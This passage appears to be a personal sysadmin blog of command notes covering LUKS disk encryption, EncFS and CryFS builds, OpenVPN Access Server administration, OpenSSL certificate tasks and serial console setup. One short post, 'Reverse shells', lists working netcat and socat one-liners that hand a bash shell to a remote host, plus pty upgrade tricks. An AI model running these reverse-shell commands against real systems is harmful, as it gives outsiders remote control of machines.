    cryptsetup luksOpen /dev/sdb1 foo
    cryptsetup status foo -v

    Test:

    cryptsetup --test-passphrase open /dev/sdb1 # (non-LUKS)
    cryptsetup luksOpen --test-passphrase /dev/sdb1
    cryptsetup isLuks /dev/sdb1 && echo IMaLUKS
    cryptsetup luksDump /dev/sdb1
    

    Change:

    (asks for the current passphrase first)

    cryptsetup -y luksChangeKey <target device> -S <target key slot number>
    cryptsetup -y luksChangeKey /dev/sdb1 -S 1
    

    Or use gui gnome-disks:

    • Disks (gnome-disks)
    • 1.0TB Hard Disk
    • Volumes: “Partition 1 1.0 TB LUKS”
    • Cogs/wheels

    Add/remove key:

    sudo cryptsetup -y luksAddKey ENCRYPTED_PARTITION
    sudo cryptsetup luksRemoveKey ENCRYPTED_PARTITION
    

    Various:

    dmsetup ls --tree
    lsblk
    lsblk --fs
    
    Reverse shells
    November 26, 2016 — 12:45

    Author: silver  Category: linux  Comments: Off

    USING NETCAT:

    SERVER/LISTEN:

    netcat -lvp 9999
    

    CLIENT:

    netcat -e /bin/sh host.name 9999
    
    NICER SHELL:

    python -c 'import pty; pty.spawn("/bin/bash")'
    ( sleep 1; echo 'bla' ) | python -c "import pty; pty.spawn(['/usr/bin/sudo','-S','whoami']);"
    

    USING SOCAT:

    SERVER/LISTEN:

    socat file:`tty`,raw,echo=0 tcp-listen:8888
    

    CLIENT:

    socat tcp-connect:host.name:8888 exec:'bash -li',pty,stderr,setsid,sigint,sane
    

    CLIENT:

    socat tcp:host.name:8888 exec:"bash -li",pty,stderr,setsid,sigint,sane
    
    socat TCP-LISTEN:8888,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane
    socat FILE:`tty`,raw,echo=0 TCP:1.2.3.4:8888
    
    export STY=
    stty rows 40 cols 130
    stty rows 40 cols 230
    
    EncFS
    November 25, 2016 — 22:02

    Author: silver  Category: encryption linux  Comments: Off

    Install on CentOS6:

    Required packages:

    yum install -y fuse-2.8.3-5.el6.x86_64 
    yum install -y fuse-libs.x86_64
    yum install -y fuse-devel.x86_64
    
    usermod -a -G fuse <your_user>
    
    yum install -y git
    yum install -y cmake
    
    yum install -y boost-serialization.x86_64
    yum install -y openssl-devel.x86_64
    yum install -y rlog-devel.x86_64
    yum install -y tinyxml2-devel.x86_64 
    yum install -y gettext-devel.x86_64
    
    yum install -y centos-release-scl
    yum install -y devtoolset-3-gcc-c++
    

    Compile:

    scl enable devtoolset-3 bash
    
    git clone https://github.com/vgough/encfs
    
    cd encfs
    mkdir build
    cd build
    cmake ..
    make
    make test
    make install
    make package
    
    mkdir ~/test
    mkdir ~/Private
    

    Test:

    encfs ~/Private ~/test
    echo testing > ~/test/testfile
    
    fusermount -u ~/test
    
    OpenVPN AS
    November 25, 2016 — 21:31

    Author: silver  Category: encryption linux  Comments: Off

    OpenVPN Access Server is quite easy and fast to set up and includes a web GUI.

    Download:

    Configuration:

    Clickety click in the gui, plus some hardening:

    Server:

    Client:

    auth SHA512
    cipher AES-256-CBC
    

    Connect with SSH + SOCKS Proxy + OTP:

    $ ssh -D 1 to remote host

    Ban user:

    Ban a user from logging into the VPN or Web server
    (doesn’t affect a user who is already logged in — for this, use DisconnectUser below):

    /usr/local/openvpn_as/scripts/sacli --user <USER> --key prop_deny --value true UserPropPut
    

    Re-admit a user who was previously banned:

    /usr/local/openvpn_as/scripts/sacli --user <USER> --key prop_deny --value false UserPropPut
    

    Disconnect a user:

    /usr/local/openvpn_as/scripts/sacli --user <USER> DisconnectUser
    

    Set client cert keysize:

    /usr/local/openvpn_as/scripts/sa --keysize=4096 Init
    

    Generating init scripts:

    /usr/local/openvpn_as/scripts/openvpnas_gen_init [--auto]

    Google Authenticator:

    Unlock a secret:

    ./sacli -u <USER> --lock 0 GoogleAuthLock

    Lock a secret:

    ./sacli -u <USER> --lock 1 GoogleAuthLock

    Generate a new, unlocked secret:

    ./sacli -u <USER> --lock 0 GoogleAuthRegen

    Generate a new, locked secret:

    ./sacli -u <USER> --lock 1 GoogleAuthRegen

    Enable Google Authenticator for all accounts:

    ./sacli --key vpn.server.google_auth.enable --value true ConfigPut

    Enable for 1 user:

    ./sacli --user <USER_OR_GROUP> --key prop_google_auth --value true UserPropPut

    Disable:

    ./sacli --key vpn.server.google_auth.enable --value false ConfigPut

    Disable for 1 user:

    ./sacli --user <USER_OR_GROUP> --key prop_google_auth --value false UserPropPut
    

    Revoke and reissue secret:

    ./sacli -u <USER> GoogleAuthRegen

    Retrieve current user properties:

    ./confdba -us -p

    Port sharing:

    Advanced VPN Settings: port-share 127.0.0.1 10443
    (tcp mode only)

    OpenSSL
    November 25, 2016 — 21:26

    Author: silver  Category: encryption linux  Comments: Off

    List processes still holding a deleted libssl open (after an update, i.e. what still needs restarting):

    lsof | grep -i libssl | grep DEL | awk '{print $1}' | sort | uniq
    

    Generate a CA key, a self-signed root cert, and sign a server CSR with it:

    openssl genrsa -out rootCA.key 2048                   # unencrypted CA key
    openssl genrsa -des3 -out rootCA.key 2048             # or: passphrase-protected CA key
    openssl req -x509 -new -nodes -key rootCA.key -sha256 -days 3650 -out rootCA.pem
    openssl x509 -req -in server.csr -CA rootCA.pem -CAkey rootCA.key -CAcreateserial -out server.crt -days 3650 -sha256
    

    View CSR

    openssl req -in file.csr -noout -text

    View cert fingerprint

    openssl x509 -fingerprint -noout -in file.crt -sha256
    openssl x509 -fingerprint -noout -in file.crt -sha1
    openssl x509 -fingerprint -noout -in file.crt -md5
    

    View ciphers:

    openssl ciphers -v 'TLSv1' | sort

    Test ciphers:

    openssl s_client -connect google.com:443 -cipher "EDH"
    openssl s_client -connect google.com:443 -cipher "RC4"
    openssl s_client -connect google.com:443 -tls1
    openssl s_client -connect google.com:443 -tls1_1
    openssl s_client -connect google.com:443 -tls1_2
    
    echo -n | openssl s_client -connect google.com:443
    nmap --script ssl-enum-ciphers -p 443
    
    

    Get fingerprint from live SSL cert (IRC):

    echo | openssl s_client -connect efnet.port80.se:6697 |& openssl x509 -fingerprint -noout -sha256
    echo | gnutls-cli -p 6697 irc.underworld.no --print-cert | sed -n '/-----BEGIN CERT/,/-----END CERT/p' |& openssl x509 -fingerprint -noout -sha256
    

    Show fingerprint:

    openssl x509 -in cert.pem -fingerprint -noout
    

    To change the password of your private key:

    openssl rsa -des3 -in ca.key -out ca_new.key
    mv ca_new.key ca.key
    

    Verifying that a Private Key Matches a Certificate

    $ openssl x509 -noout -modulus -in server.pem | openssl md5 ;\
    openssl rsa -noout -modulus -in server.key | openssl md5
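The modulus comparison above only works for RSA keys. Comparing the public key extracted from the private key with the one in the certificate does the same job for EC keys as well. The script below is an added example, not from the original post; it generates a throwaway self-signed pair (plus an unrelated second pair) in a temporary directory so the check can be exercised offline.

```shell
#!/bin/sh
# Added example (not from the original post): check that a private key and
# certificate belong together by comparing their public keys, which works
# for RSA as well as EC keys (the -modulus trick above is RSA-only). A
# throwaway RSA pair and a second, unrelated pair are generated in a temp
# dir so the check can be exercised offline.

# key_matches_cert KEY.pem CERT.pem -> exit 0 if the public keys are identical,
# 1 if they differ, 2 if either file could not be read.
key_matches_cert() {
    pub_key=$(openssl pkey -in "$1" -pubout 2>/dev/null) || return 2
    pub_crt=$(openssl x509 -in "$2" -noout -pubkey 2>/dev/null) || return 2
    [ -n "$pub_key" ] && [ "$pub_key" = "$pub_crt" ]
}

# make_selfsigned DIR NAME: constructed test material (key + self-signed cert).
make_selfsigned() {
    openssl req -x509 -newkey rsa:2048 -nodes -keyout "$1/$2.key" \
        -out "$1/$2.crt" -subj "/CN=$2" -days 1 >/dev/null 2>&1
}

demo() {
    d=$(mktemp -d)
    make_selfsigned "$d" server && make_selfsigned "$d" other
    if key_matches_cert "$d/server.key" "$d/server.crt"; then
        echo "server.key <-> server.crt: match"
    fi
    if ! key_matches_cert "$d/other.key" "$d/server.crt"; then
        echo "other.key <-> server.crt: MISMATCH"
    fi
    rm -rf "$d"
}
demo
```

On a live system: `key_matches_cert /etc/ssl/private/privkey.pem /etc/ssl/certs/cert.pem` before reloading a web server, so a mismatched pair is caught before the daemon refuses to start.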
    

    Get the MD5 fingerprint of a certificate using OpenSSL

    openssl dgst -md5 certificate.der

    Get the MD5 fingerprint of a CSR using OpenSSL

    openssl dgst -md5 csr.der

    Debug SMTP/STARTTLS:

    openssl s_client -debug -starttls smtp -crlf -connect localhost:25
    File Encryption
    November 25, 2016 — 18:44

    Author: silver  Category: encryption linux  Comments: Off

    All of these are FUSE based except for eCryptfs.

    Comparison: https://nuetzlich.net/gocryptfs/comparison

     

    CryFS
    November 25, 2016 — 18:18

    Author: silver  Category: encryption linux  Comments: Off

    Download:
     
    http://cryfs.org
    https://github.com/cryfs/cryfs
     
    Compile under CentOS 6:
     

    yum install https://www.softwarecollections.org/repos/denisarnaud/boost157/epel-6-x86_64/noarch/denisarnaud-boost157-epel-6-x86_64-1-2.noarch.rpm
    yum install -y boost157-devel.x86_64 boost157-static.x86_64 
    
    scl enable devtoolset-3 bash
    export BOOST_ROOT=/usr/include/boost157
    export BOOST_LIBRARYDIR=/usr/lib64/boost157
    mkdir cmake && cd cmake
    cmake ..
    make
    sudo make install
    
    Serial console
    November 25, 2016 — 17:14

    Author: silver  Category: linux  Comments: Off

    /etc/default/grub:

    GRUB_CMDLINE_LINUX="video=off elevator=deadline console=tty0 console=ttyS0,115200"
    GRUB_TERMINAL=serial
    GRUB_SERIAL_COMMAND="serial --unit=0 --speed=115200 --stop=1"
    

    /etc/inittab:

    0:2345:respawn:/sbin/agetty -8 ttyS0 115200 vt100